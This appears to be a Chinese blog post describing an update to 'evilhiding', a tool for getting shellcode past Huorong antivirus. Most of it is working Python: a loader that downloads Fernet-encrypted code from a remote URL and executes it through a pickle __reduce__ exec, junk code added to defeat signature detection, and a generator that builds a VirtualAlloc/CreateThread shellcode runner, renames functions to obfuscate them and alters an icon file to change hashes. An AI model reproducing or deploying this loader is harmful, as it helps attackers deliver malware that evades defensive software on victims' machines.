记一次有趣的免杀探索

coleak2023-11-02 17:57

文章目录

前记

evilhiding昨天被提issue不能绕过火绒了,于是今天更新了evilhiding v1.1,已经可以继续免杀了。

期待各位的stars,项目地址如下:

复制代码 
https://github.com/coleak2021/evilhiding

查杀排查

直接python运行b.py发现未被查杀,且可正常上线,但是通过pyinstaller打包为exe后发现被火绒查杀,因此打算对源代码进行修改来绕过火绒

于是对b.py关键部分分别打包检查,发现均未被查杀

加载器

复制代码 
import pickle,base64,requests,ctypes
from cryptography.fernet import Fernet

url=''
def O7867890(sectr):
    KEY=b'Lo8QurfIObo62aKQsQjnzAocsnrrIkTsJewRJLLKAsA='
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))

    ret = pickle.dumps(A())
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

执行器

复制代码 
def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    exec(t1)
    exec(t2)
    O1674418()

花指令

复制代码 
t2 ="""
import base64

st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

t1 ="""
import random

def O4402217(test_arr, low, high):
   i = (low - 1)  
   pivot = test_arr[high]

   for j in range(low, high):
       if test_arr[j] <= pivot:
           i = i + 1
           test_arr[i], test_arr[j] = test_arr[j], test_arr[i]

   test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1]
   return i + 1


def O7313740(test_arr, low, high):
   if low < high:
       pi = O4402217(test_arr, low, high)
       O7313740(test_arr, low, pi - 1)
       O7313740(test_arr, pi + 1, high)


test_arr= []
for i in range(59999):
   test_arr.append(random.random())
n= len(test_arr)
O7313740(test_arr,0, n - 1)
   """

得出结论:各部分可以分别正常打包,但是火绒对整体进行了特征提取,因此我们只需要将文件结构做修改即可

源码修改

经过测试,最终对b.py修改为如下,此时打包为exe可绕过火绒正常上线

复制代码 
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random

url=''
def O7867890(sectr):
    KEY=b''
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))
        def say_hello(self):
            exec(bbb)
    a=A()
    a.say_hello()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

bbb ="""
import base64
st= 'cccccccccccccccccccooooooooooollllllllllllleeeeeeeeeeeeaaaaaaaaaaaakkkkkkkkk'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    O1674418()

因此,对main.py生成器修改如下

复制代码 
# -*- coding: utf-8 -*-

import base64
import re,os,time
from cryptography.fernet import Fernet

shellcode = b""
url=''
key = Fernet.generate_key()
fernet = Fernet(key)
enstr = fernet.encrypt(shellcode)
key2 = Fernet.generate_key()
fernet2 = Fernet(key2)
a=f'''
import ctypes
from cryptography.fernet import Fernet
KEY={key}
fernet=Fernet(KEY)
shellcode=fernet.decrypt({enstr})

shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
'''

cccc=f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
url=f'{url}'
a=[]
class B():
    def cc(self):
        for i in range(5):
            a.append(i)

def O7303771(sectr):
    global destr
    KEY={key2}
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    aaa(destr)

def aaa(destr):
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))
        def O6294286(self):
            exec(bbb)
    a=A()
    a.O6294286()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

bbb ="""
for i in range(100):
    aaa=B()
    aaa.cc()
   """

def O0135984():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7303771(r.text)
    else:
        pass
if __name__ == '__main__':
    O0135984()
'''

def hunxiao():
    openfile = 'content.txt'
    text = open(openfile, encoding='utf-8').read()
    wd_df = re.findall("def (.*?)\\(", text)
    wd_df = list(set(wd_df))
    for i in wd_df:
        if i[0:2] == "__":
            wd_df.remove(i)
        if i == 'super':
            wd_df.remove(i)
    idlist = []
    for i in wd_df:
        idlist.append('O' + str(hash(i))[-7:])

    cs = len(wd_df)
    if cs == len(set(idlist)):
        while cs > 0:
            cs -= 1
            text = text.replace(wd_df[cs] + '(', idlist[cs] + '(')
            text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs])
            text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs])
            text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs])
    else:
        print('hash repeat')

    file_save = open('b.py', 'w', encoding='utf-8')
    file_save.write(text)
    file_save.close()

with open('content.txt', 'bw') as f:
    f.write(cccc.encode())
    hunxiao()

with open('a.txt', 'bw') as f:
    f.write(fernet2.encrypt(a.encode()))

with open('content.txt', 'br') as f:
    content=base64.b64encode(f.read())

b = f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
cccc={content}
exec(base64.b64decode(cccc).decode())
'''

with open('b.py', 'w', encoding='utf-8') as f:
    f.write(b)

iconame=f'{int (time.time() *1000)}.ico'
with open('coleak.ico',"br") as f:
    cont=f.read()
with open(f'{iconame}',"bw") as f:
    cont+=iconame.encode()
    f.write(cont)
with open('create.py',"br") as f:
    createit=f.read()
exec(createit)

免杀效果测试


相关推荐
橡晟4 小时前
深度学习入门:让神经网络变得“深不可测“⚡(二)
人工智能·python·深度学习·机器学习·计算机视觉
墨尘游子4 小时前
神经网络的层与块
人工智能·python·深度学习·机器学习
倔强青铜34 小时前
苦练Python第18天:Python异常处理锦囊
开发语言·python
企鹅与蟒蛇5 小时前
Ubuntu-25.04 Wayland桌面环境安装Anaconda3之后无法启动anaconda-navigator问题解决
linux·运维·python·ubuntu·anaconda
autobaba5 小时前
编写bat文件自动打开chrome浏览器,并通过selenium抓取浏览器操作chrome
chrome·python·selenium·rpa
Immortal__y5 小时前
网络安全初级--搭建
安全·web安全
Rvelamen6 小时前
LLM-SECURITY-PROMPTS大模型提示词攻击测评基准
人工智能·python·安全
liulilittle6 小时前
.NET ExpandoObject 技术原理解析
开发语言·网络·windows·c#·.net·net·动态编程
【本人】6 小时前
Django基础(一)———创建与启动
后端·python·django
凯基迪科技7 小时前
游戏设备软件加密锁复制:技术壁垒与安全博弈
安全·游戏
热门推荐
01全球最强模型Grok4,国内已可免费使用!(附教程)02KGG转MP3工具|非KGM文件|解密音频03Coze扣子平台完整体验和实践(附国内和国际版对比)04基于odoo17的设计模式详解---单例模式05使用Ruby接入实时行情API教程06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07《深入设计模式》模式结构汇总08集群聊天服务器---MySQL数据库的建立09DeepSeek各版本说明与优缺点分析10绿色建筑新态势:楼宇自控助力能效提升,推动成本优化新路径